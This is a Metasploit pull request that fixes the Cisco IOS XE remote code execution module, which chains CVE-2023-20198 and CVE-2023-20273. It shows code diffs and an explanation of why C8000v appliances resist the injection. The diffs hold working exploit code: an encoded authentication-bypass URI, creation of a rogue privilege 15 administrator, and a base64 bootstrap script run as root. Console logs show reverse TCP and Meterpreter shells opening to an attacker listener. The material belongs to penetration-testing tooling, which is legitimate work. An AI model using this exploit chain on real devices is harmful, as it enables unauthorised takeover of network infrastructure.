 View the full module info with the info, or info -d command.
 
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
-[+] 192.168.86.59:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > check 
+[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
-[*] Created privilege 15 user 'pJaWZBTl' with password 'KlcuLPaJ'
-[*] Removing user 'pJaWZBTl'
-[*] Sending stage (24772 bytes) to 192.168.86.59
-[*] Meterpreter session 3 opened (192.168.86.42:4444 -> 192.168.86.59:56572) at 2023-11-06 16:42:36 +0000
+[*] Created privilege 15 user 'vhQbLuix' with password 'JAjuUVov'
+[*] Removing user 'vhQbLuix'
+[*] Sending stage (24772 bytes) to 192.168.86.114
+[*] Meterpreter session 11 opened (192.168.86.122:4444 -> 192.168.86.114:61966) at 2025-03-03 20:37:36 +0000
 
 meterpreter > getuid
 Server username: root
 meterpreter > sysinfo
-Computer     : router
+Computer     : test2_c1000v
 OS           : Linux 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019
 Architecture : x64
 Meterpreter  : python/linux
-meterpreter > 
+meterpreter >
 ```
 
 ```
 msf6 exploit(linux/misc/cisco_ios_xe_rce) > set payload cmd/unix/reverse_bash
 payload => cmd/unix/reverse_bash
-msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit
-
-[*] Started reverse TCP handler on 192.168.86.42:4444 
+msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
+[*] Started reverse TCP handler on 192.168.86.122:4444 
 [*] Running automatic check ("set AutoCheck false" to disable)
 [+] The target is vulnerable. Cisco IOS XE Software, Version 16.12.03
-[*] Created privilege 15 user 'aZIYJugi' with password 'RziZqysr'
-[*] Removing user 'aZIYJugi'
-[*] Command shell session 4 opened (192.168.86.42:4444 -> 192.168.86.59:56584) at 2023-11-06 16:43:30 +0000
+[*] Created privilege 15 user 'JJgILIEn' with password 'EkMpGWih'
+[*] Removing user 'JJgILIEn'
+[*] Command shell session 12 opened (192.168.86.122:4444 -> 192.168.86.114:61982) at 2025-03-03 20:38:16 +0000
 
 id
 uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:polaris_nginx_t:s0
 uname -a
-Linux router 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
+Linux test2_c1000v 4.19.64 #1 SMP Wed Dec 11 10:30:30 PST 2019 x86_64 x86_64 x86_64 GNU/Linux
 exit
-[*] 192.168.86.59 - Command shell session 4 closed.
+[*] 192.168.86.114 - Command shell session 12 closed.
 msf6 exploit(linux/misc/cisco_ios_xe_rce) > 
 ```

--- a/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
+++ b/lib/msf/core/exploit/remote/http/cisco_ios_xe.rb
@@ -57,7 +57,7 @@ module Msf
 
       res = send_request_cgi(
         'method' => 'POST',
-        'uri' => '/%2577ebui_wsma_https',
+        'uri' => datastore['SSL'] == true ? '/%2577eb%2575i_%2577sma_hTtPs' : '/%2577eb%2575i_%2577sma_hTtP',
         'data' => xml
       )
 

--- a/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb
+++ b/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb
@@ -45,6 +45,9 @@ class MetasploitModule < Msf::Auxiliary
           17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
           17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
           17.11.99SW
+
+          NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
+          though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb
+++ b/modules/auxiliary/admin/http/cisco_ios_xe_os_exec_cve_2023_20273.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Auxiliary
           17.11.99SW
 
           NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
-          though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
+          though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -271,11 +271,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ensure
       # Deleting the output file can take more than one attempt.
       retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
-        if run_os_command("rm #{check_path}", username, password)
-          next true
-        end
-
-        false
+        next run_os_command("rm #{check_path}", username, password)
       end
     end
 

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
           17.11.99SW
 
           NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
-          though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
+          though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -155,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Now we leverage both CVE-2023-20198 and CVE-2023-20273 to ensure the target is actually vulnerable. For example,
     # it has been observed that the C8000v series appliance version 17.6.5 is vulnerable to CVE-2023-20198, but not
-    # vulnerable to CVE-2023-20273, even though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
+    # vulnerable to CVE-2023-20273, even though the IOS XE version indicates they should be vulnerable to CVE-2023-20273.
     # As this exploit chains both CVE-2023-20198 and CVE-2023-20273 together, the check routine must verify both CVEs
     # work as expected in order to return CheckCode::Vulnerable (i.e. we cannot solely rely on a version based check via
     # CVE-2023-20198).

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -43,6 +43,9 @@ class MetasploitModule < Msf::Exploit::Remote
           17.10.1b, 17.8.1, 17.8.1a, 17.9.1, 17.9.1w, 17.9.2, 17.9.1a, 17.9.1x, 17.9.1y, 17.9.3,
           17.9.2a, 17.9.1x1, 17.9.3a, 17.9.4, 17.9.1y1, 17.11.1, 17.11.1a, 17.12.1, 17.12.1a,
           17.11.99SW
+
+          NOTE: The C8000v series appliance version 17.6.5 was observed to not be vulnerable to CVE-2023-20273, even
+          though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
         },
         'License' => MSF_LICENSE,
         'Author' => [

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # By here we know the target is the IOS XE Web UI. We leverage the vulnerability to pull out the version number,
-    # so if this request succeeds, then we known the target is vulnerable.
+    # so if this request succeeds, then we know the target is vulnerable.
     res = run_cli_command('show version', Mode::PRIVILEGED_EXEC)
 
     # If the above request failed, then the target is safe.
@@ -153,69 +153,132 @@ class MetasploitModule < Msf::Exploit::Remote
       version = Regexp.last_match(1)
     end
 
+    # Now we leverage both CVE-2023-20198 and CVE-2023-20273 to ensure the target is actually vulnerable. For example,
+    # it has been observed that the C8000v series appliance version 17.6.5 vulnerable to CVE-2023-20198, but not
+    # vulnerable to CVE-2023-20273, even though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
+    # As this exploit chain both CVE-2023-20198 and CVE-2023-20273 together, the check routine must verify both CVEs
+    # work as expected in order to return CheckCode::Vulnerable (i.e. we cannot solely rely on a version based check via
+    # CVE-2023-20198).
+    failure, message = do_auth_bypass(verbose: false) do |username, password|
+      do_rce_check(username, password)
+    end
+
+    return CheckCode::Safe("#{message}. #{version}") unless failure == Failure::None
+
     CheckCode::Vulnerable(version)
   end
 
   def exploit
+    failure, message = do_auth_bypass(verbose: true) do |username, password|
+      do_rce_payload(username, password)
+    end
+
+    fail_with(failure, message) unless failure == Failure::None
+  end
+
+  def do_auth_bypass(verbose: true)
     admin_username = rand_text_alpha(8)
     admin_password = rand_text_alpha(8)
 
     # Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account.
     unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION)
-      fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
+      return [Failure::UnexpectedReply, 'Failed to create admin user']
     end
 
     begin
-      print_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'")
+      print_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'") if verbose
 
-      # Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload...
+      failure, message = yield(admin_username, admin_password)
 
-      # A shell script to execute the Metasploit payload. Will delete itself upon execution.
-      bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
-
-      # The location of our bootstrap script.
-      bootstrap_file = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
-
-      # NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and
-      # 17.8 to work as expected. Version 16.* did not work when semi colons were present in the command line.
-
-      # Write a script to disk which will execute the Metasploit payload. We base64 encode it to avoid any problems
-      # with restricted chars, and leverage openssl to decode and write the contents to disk.
-      success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
-        next run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}", admin_username, admin_password)
-      end
-
-      unless success
-        fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file')
-      end
-
-      # Make the script executable.
-      success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
-        next run_os_command("chmod +x #{bootstrap_file}", admin_username, admin_password)
-      end
-
-      unless success
-        fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file')
-      end
-
-      # Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by
-      # default. The VRF allows the executed script to route its network traffic back the framework. The map_chvrf.sh
-      # scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply.
-      success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
-        next run_os_command("/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}", admin_username, admin_password)
-      end
-
-      unless success
-        fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file')
-      end
+      return [failure, message]
     ensure
-      print_status("Removing user '#{admin_username}'")
+      print_status("Removing user '#{admin_username}'") if verbose
 
       # Leverage CVE-2023-20198 to remove the admin account we previously created.
-      unless run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION)
+      if !run_cli_command("no username #{admin_username}", Mode::GLOBAL_CONFIGURATION) && verbose
         print_warning('Failed to remove user')
       end
     end
+
+    [Failure::None, nil]
   end
 
+  def do_rce_payload(username, password)
+    # Leverage CVE-2023-20273 to run an arbitrary OS commands and bootstrap a Metasploit payload...
+
+    # A shell script to execute the Metasploit payload. Will delete itself upon execution.
+    bootstrap_script = "#!/bin/sh\nrm -f $0\n#{payload.encoded}"
+
+    # The location of our bootstrap script.
+    bootstrap_file = "/tmp/#{Rex::Text.rand_text_alpha(8)}"
+
+    # NOTE: Rather than chaining the commands with a semicolon, we run them separately. This allows version 16.* and
+    # 17.8 to work as expected. Version 16.* did not work when semicolons were present in the command line.
+
+    # Write a script to disk which will execute the Metasploit payload. We base64 encode it to avoid any problems
+    # with restricted chars, and leverage openssl to decode and write the contents to disk.
+    success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+      next run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}", username, password)
+    end
+
+    return [Failure::UnexpectedReply, 'Failed to plant the bootstrap file'] unless success
+
+    # Make the script executable.
+    success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+      next run_os_command("chmod +x #{bootstrap_file}", username, password)
+    end
+
+    return [Failure::UnexpectedReply, 'Failed to chmod the bootstrap file'] unless success
+
+    # Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by
+    # default. The VRF allows the executed script to route its network traffic back the framework. The map_chvrf.sh
+    # scripts wraps a call to /usr/sbin/chvrf, which will conveniently fork the command we supply.
+    success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+      next run_os_command("/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}", username, password)
+    end
+
+    return [Failure::UnexpectedReply, 'Failed to execute the bootstrap file'] unless success
+
+    [Failure::None, nil]
+  end
+
+  # We can check a target is vulnerable to CVE-2023-20273, by leveraging CVE-2023-20273 to write a file to the web root
+  # folder, and then read that file back out via an HTTP GET request. If we can read back out the expected data, we know
+  # the target is vulnerable to CVE-2023-20273.
+  def do_rce_check(username, password)
+    check_data = Rex::Text.rand_text_alpha(16)
+
+    check_file = Rex::Text.rand_text_alpha(16)
+
+    check_path = "/var/www/#{check_file}"
+
+    cmd = "echo -n #{check_data} > #{check_path}"
+
+    return [Failure::UnexpectedReply, 'Failed to run check command via CVE-2023-20273'] unless run_os_command(cmd, username, password)
+
+    begin
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => normalize_uri('webui', check_file),
+        'headers' => {
+          'Authorization' => basic_auth(username, password)
+        }
+      )
+
+      return [Failure::UnexpectedReply, 'Failed to get check command output for CVE-2023-20273'] unless res&.code == 200
+
+      return [Failure::UnexpectedReply, 'Failed to validate check command output for CVE-2023-20273'] unless res&.body == check_data
+    ensure
+      # Deleting the output file can take more than one attempt.
+      retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
+        if run_os_command("rm #{check_path}", username, password)
+          next true
+        end
+
+        false
+      end
+    end
+
+    [Failure::None, nil]
+  end
 end

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -131,7 +131,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     return CheckCode::Unknown('Connection failed') unless res
 
-    # We look for one of two identifiers to ensure the request to /webui above returns something with Cisco in the content.
+    # We look for one of two identifiers to ensure the request to /webui/ above returns something with Cisco in the content.
     if res.code != 200 || (!res.body.include?('Cisco Systems, Inc.') || !res.headers['Content-Security-Policy']&.include?('cisco.com'))
       return CheckCode::Unknown('Web UI not detected')
     end
@@ -154,9 +154,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     # Now we leverage both CVE-2023-20198 and CVE-2023-20273 to ensure the target is actually vulnerable. For example,
-    # it has been observed that the C8000v series appliance version 17.6.5 vulnerable to CVE-2023-20198, but not
+    # it has been observed that the C8000v series appliance version 17.6.5 is vulnerable to CVE-2023-20198, but not
     # vulnerable to CVE-2023-20273, even though the IOS-XE version indicates they should be vulnerable to CVE-2023-20273.
-    # As this exploit chain both CVE-2023-20198 and CVE-2023-20273 together, the check routine must verify both CVEs
+    # As this exploit chains both CVE-2023-20198 and CVE-2023-20273 together, the check routine must verify both CVEs
     # work as expected in order to return CheckCode::Vulnerable (i.e. we cannot solely rely on a version based check via
     # CVE-2023-20198).
     failure, message = do_auth_bypass(verbose: false) do |username, password|

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -126,7 +126,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # the Web UI exposed (which is the vulnerable component).
     res = send_request_cgi(
       'method' => 'GET',
-      'uri' => normalize_uri('webui')
+      'uri' => normalize_uri('webui', '/')
     )
 
     return CheckCode::Unknown('Connection failed') unless res

--- a/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
+++ b/modules/exploits/linux/misc/cisco_ios_xe_rce.rb
@@ -159,21 +159,26 @@ class MetasploitModule < Msf::Exploit::Remote
     # As this exploit chains both CVE-2023-20198 and CVE-2023-20273 together, the check routine must verify both CVEs
     # work as expected in order to return CheckCode::Vulnerable (i.e. we cannot solely rely on a version based check via
     # CVE-2023-20198).
-    failure, message = do_auth_bypass(verbose: false) do |username, password|
-      do_rce_check(username, password)
+    begin
+      # NOTE: We pass verbose as false, because a check routine should not print status messages to the console, and
+      # do_auth_bypass may print several status messages if verbose is true.
+      do_auth_bypass(verbose: false) do |username, password|
+        do_rce_check(username, password)
+      end
+    rescue Msf::Exploit::Failed => e
+      # If either the auth bypass, or the command injection have failed (via a call to fail_with), we catch the
+      # exception here and return a CheckCode of Safe to indicate this target is not vulnerable. We can provide
+      # some additional context to the user by passing the Failure message to the CheckCode.
+      return CheckCode::Safe("#{e}. #{version}")
     end
-
-    return CheckCode::Safe("#{message}. #{version}") unless failure == Failure::None
 
     CheckCode::Vulnerable(version)
   end
 
   def exploit
-    failure, message = do_auth_bypass(verbose: true) do |username, password|
+    do_auth_bypass(verbose: true) do |username, password|
       do_rce_payload(username, password)
     end
-
-    fail_with(failure, message) unless failure == Failure::None
   end
 
   def do_auth_bypass(verbose: true)
@@ -182,15 +187,13 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Leverage CVE-2023-20198 to run an arbitrary CLI command and create a new admin user account.
     unless run_cli_command("username #{admin_username} privilege 15 secret #{admin_password}", Mode::GLOBAL_CONFIGURATION)
-      return [Failure::UnexpectedReply, 'Failed to create admin user']
+      fail_with(Failure::UnexpectedReply, 'Failed to create admin user')
     end
 
     begin
       print_status("Created privilege 15 user '#{admin_username}' with password '#{admin_password}'") if verbose
 
-      failure, message = yield(admin_username, admin_password)
-
-      return [failure, message]
+      yield(admin_username, admin_password)
     ensure
       print_status("Removing user '#{admin_username}'") if verbose
 
@@ -199,8 +202,6 @@ class MetasploitModule < Msf::Exploit::Remote
         print_warning('Failed to remove user')
       end
     end
-
-    [Failure::None, nil]
   end
 
   def do_rce_payload(username, password)
@@ -221,14 +222,14 @@ class MetasploitModule < Msf::Exploit::Remote
       next run_os_command("openssl enc -base64 -out #{bootstrap_file} -d <<< #{Base64.strict_encode64(bootstrap_script)}", username, password)
     end
 
-    return [Failure::UnexpectedReply, 'Failed to plant the bootstrap file'] unless success
+    fail_with(Failure::UnexpectedReply, 'Failed to plant the bootstrap file') unless success
 
     # Make the script executable.
     success = retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
       next run_os_command("chmod +x #{bootstrap_file}", username, password)
     end
 
-    return [Failure::UnexpectedReply, 'Failed to chmod the bootstrap file'] unless success
+    fail_with(Failure::UnexpectedReply, 'Failed to chmod the bootstrap file') unless success
 
     # Execute our bootstrap script via mcp_chvrf.sh, and with 'global' virtual routing and forwarding (vrf) by
     # default. The VRF allows the executed script to route its network traffic back the framework. The map_chvrf.sh
@@ -237,9 +238,7 @@ class MetasploitModule < Msf::Exploit::Remote
       next run_os_command("/usr/binos/conf/mcp_chvrf.sh #{datastore['CISCO_VRF_NAME']} sh #{bootstrap_file}", username, password)
     end
 
-    return [Failure::UnexpectedReply, 'Failed to execute the bootstrap file'] unless success
-
-    [Failure::None, nil]
+    fail_with(Failure::UnexpectedReply, 'Failed to execute the bootstrap file') unless success
   end
 
   # We can check a target is vulnerable to CVE-2023-20273, by leveraging CVE-2023-20273 to write a file to the web root
@@ -254,7 +253,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     cmd = "echo -n #{check_data} > #{check_path}"
 
-    return [Failure::UnexpectedReply, 'Failed to run check command via CVE-2023-20273'] unless run_os_command(cmd, username, password)
+    fail_with(Failure::UnexpectedReply, 'Failed to run check command via CVE-2023-20273') unless run_os_command(cmd, username, password)
 
     begin
       res = send_request_cgi(
@@ -265,16 +264,14 @@ class MetasploitModule < Msf::Exploit::Remote
         }
       )
 
-      return [Failure::UnexpectedReply, 'Failed to get check command output for CVE-2023-20273'] unless res&.code == 200
+      fail_with(Failure::UnexpectedReply, 'Failed to get check command output for CVE-2023-20273') unless res&.code == 200
 
-      return [Failure::UnexpectedReply, 'Failed to validate check command output for CVE-2023-20273'] unless res&.body == check_data
+      fail_with(Failure::UnexpectedReply, 'Failed to validate check command output for CVE-2023-20273') unless res&.body == check_data
     ensure
       # Deleting the output file can take more than one attempt.
       retry_until_truthy(timeout: datastore['CISCO_CMD_TIMEOUT']) do
         next run_os_command("rm #{check_path}", username, password)
       end
     end
-
-    [Failure::None, nil]
   end
 end


### PR DESCRIPTION
This pull request fixes several bugs in the `exploit/linux/misc/cisco_ios_xe_rce` module. It was reported that this module was failing for a target Cisco IOS XE device running version `17.06.05`. After recreating the failure in a lab environment, several issue became apparent. The original module (pull #18507) was tested against several versions from the CSR1000v series of appliances, however when testing against a C8000v series appliance the module would fail unexpectedly. The issues when targeting a C8000v series appliance were as follows.

* In the check routine, a request to the `/webui` URI is made, when targeting both CSR1000v and C8000v series appliances, this URI should be `/webui/` (Note the trailing path separator). Fixed in commit https://github.com/rapid7/metasploit-framework/pull/19934/commits/4a3860557686f4be41155b89feb30340a92718db.
* In the helper function `run_cli_command` the target URI `/%2577ebui_wsma_https` was being used to leverage the first vulnerability in the exploit chain, CVE-2023-20198. When targeting both CSR1000v and C8000v series appliances the `_https` portion must also not all be in lowercase, e.g. `/%2577eb%2575i_%2577sma_hTtPs`. Additionally, if targeting HTTP and not HTTPS, the URI `/%2577eb%2575i_%2577sma_hTtP` must be used (Note the lack of a trailing `s`). Fixed in commit https://github.com/rapid7/metasploit-framework/pull/19934/commits/60a496eec99cf60541eca8bc4aef0b190618501c.

So before these changes, targeting a C8000v series appliance running IOS XE version `17.06.05` would show this in the check routine:

```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.108
RHOSTS => 192.168.86.108
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
[*] 192.168.86.108:443 - Cannot reliably check exploitability. Web UI not detected
```

However, after the above changes, exploitation against a C8000v series appliance running IOS XE version `17.06.05` would fail to execute a payload.

```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.108:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.06.05
msf6 exploit(linux/misc/cisco_ios_xe_rce) > exploit 
[*] Started reverse TCP handler on 192.168.86.122:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Cisco IOS XE Software, Version 17.06.05
[*] Created privilege 15 user 'HFCaCraU' with password 'aSlKeEiT'
[*] Removing user 'HFCaCraU'
[*] Exploit completed, but no session was created.
```

Digging into the source code for the C8000v series appliance running IOS XE version `17.06.05`, shows that this series/version is vulnerable to CVE-2023-20198, and while it is also vulnerable to the OS command injection CVE-2023-20273, **the command injection it is not exploitable** due to additional filtering present in the Lua code that was not seen in the CSR1000v series appliances. 

This is because the `installAdd` REST endpoint actually calls `softwareUpgradeUtils.startInstallOp` to execute the OS command that contains the command injection (the attacker can poison the `url` variable, passed to the `--remote_path` argument) and not `utils.runOSCommand` like in the CSR1000v appliances.


```lua
        if lastTag == "installAdd" then
            validateSmuRequest(inp)
            local url, destinationFile, installfilename = generateUrlAndDestination(inp)
            writeInstallOperationType(inp.operation_type)
            installParams.operation = "install_add"
            installParams.filename = destinationFile
            writeSmuInstallParams(installParams)
            local mode = inp.mode
            -- Install involved file download, which might take long, so it will run in the background.
            local installOpParams = {smu_install_script, "--operation", "install_add", "--operation_type", inp.operation_type, "--install_method", mode, "--remote_path", url, "--file_path", destinationFile, "&"}
            softwareUpgradeUtils.startInstallOp(installOpParams, installOpEnumForSyslog.ADD, installfilename)
            ngx.exit(ngx.HTTP_OK)
```

But `softwareUpgradeUtils.startInstallOp` will call `utils.runPexecCommand` to execute the command.

```lua
function softwareUpgradeUtils.startInstallOp(installOpParams, installOpName, installOpDetail)
    -- Generate the syslog if the install operation name is available. hen start the install operation
    if not utils.isNilOrEmptyString(installOpName) then
        softwareUpgradeUtils.generateInstallSyslog(installOpName, installOpDetail, installOpParams)
    end
    utils.runPexecCommand("setsid", installOpParams)
end
```

And `utils.runPexecCommand` will call `pexec.pexec_setsid`.

```lua
function utils.runPexecCommand(commandPart,argumentsPart)
    local response
    if commandPart == "setsid" then
        response = pexec.pexec_setsid(commandPart, argumentsPart)
    else
        response = pexec.pexec(commandPart, argumentsPart)
    end
    return response;
end
```

We can see that `pexec_setsid` will call `gen_cmd_str`.

```lua
function _M.pexec_setsid(cmd, args)

    local size = #args

    if args[size] ~= "&" then
        return nil, " no \"&\" at end"
    end

    local cmd_str, err = gen_cmd_str(cmd, args)

    if not cmd_str then
        return nil, err
    end
    local proc
    proc, err = pipe_spawn(cmd_str)
    if not proc then
        return nil, " failed to spawn: " .. tostring(err)
    end
    return true, err
end
```

And `gen_cmd_str` will call `args_valid`.

```lua
local function gen_cmd_str(cmd, args)
    local ok = cmd_valid(cmd)
    if ok == nil then
        return nil, "invalid command"
    end

    ok = args_valid(args)
    if not ok  then
        return nil, "invalid args"
    end
    local arg_str = table.concat(args, " ")
    local cmd_str = cmd .. " " .. arg_str
    return cmd_str, "ok"
end
```

The function `args_valid` will validate the arguments, and we fail to inject with the attacker controlled `url` argument (passed with the `--remote_path` option), because we cannot satisfy any of the below checks.

```lua
local function args_valid(args)
    local n = #args
    for key, arg in ipairs(args) do
        if not arg then
            break
        end
	if is_relative_path(arg) == nil then
	    break
	end
        --& can only appear at end of array
        if key == n and  arg == "&" then
            break
        end
        -- args can be one of following pattern
        if is_option(arg) == nil
            and is_empty_str(arg) == nil
            and  is_path(arg) == nil
            and  is_ios_path(arg) == nil
            and is_url(arg) == nil then
            return false
        end
    end
    return true
end

-- path has to be absloute path
-- path pattern : '^%/[%w_%.%-%/]+$'
-- it could be more strict,  but it is hard to get all
-- white list
-- example: /.test
-- /test/test.test/test
-- /test/test_test/test.test
-- /test/test123/test.123
-- /test/test/test*
local path_pattern = '^%/[%w_%.%-%/%*]+$'

local function is_path(arg)
    return string.match(arg, path_pattern)
end

local ios_path_pattern = '^[%w%-_]+:[%w_%.%-%/]+$'

local function is_ios_path(arg)
    return string.match(arg, ios_path_pattern)
end

-- url pattern
-- format: Protocol://user-name:password@ip-address/path_to_the_file/file_name
-- protocol: Protocols are usually alphabetical strings (ftp, tftp, sftp, scp, http etc)
-- using "[%a]+" for prototol
-- User-name and password might have special characters + alpha-numerics
-- [%w_.~!*:@&+$/?%%#-]-  for user name password
-- Ip addresses could be ipv4 addresses or ipv6 addresses
-- [%w%.:]+
-- path : [%w_%.%-%/]+

local url_pattern = '^[%a]+://[%w_.~!*:@&+$/?%%#-]-[%w_%.:%-%/]+$'

local function is_url(arg)
    return  string.match(arg, url_pattern)
end

```

Given the exploit can fail against some IOS XE targets, the `check` routine will now exploit both CVE-2023-20198 and CVE-2023-20273 to ensure a target is actually vulnerable, and can be exploited to execute a payload. Fixed in commit https://github.com/rapid7/metasploit-framework/pull/19934/commits/9c075c7cce129167352adfaa75ddbd679d43e5a6.

For example, we can see the new check routine working against two CSR1000v targets, then failing with a useful error message for the C8000v target.

```
msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.114
RHOSTS => 192.168.86.114
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.114:443 - The target is vulnerable. Cisco IOS XE Software, Version 16.12.03


msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.113
RHOSTS => 192.168.86.113
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check
[+] 192.168.86.113:443 - The target is vulnerable. Cisco IOS XE Software, Version 17.03.02


msf6 exploit(linux/misc/cisco_ios_xe_rce) > set RHOSTS 192.168.86.108
RHOSTS => 192.168.86.108
msf6 exploit(linux/misc/cisco_ios_xe_rce) > check 
[*] 192.168.86.108:443 - The target is not exploitable. Failed to get check command output for CVE-2023-20273. Cisco IOS XE Software, Version 17.06.05
```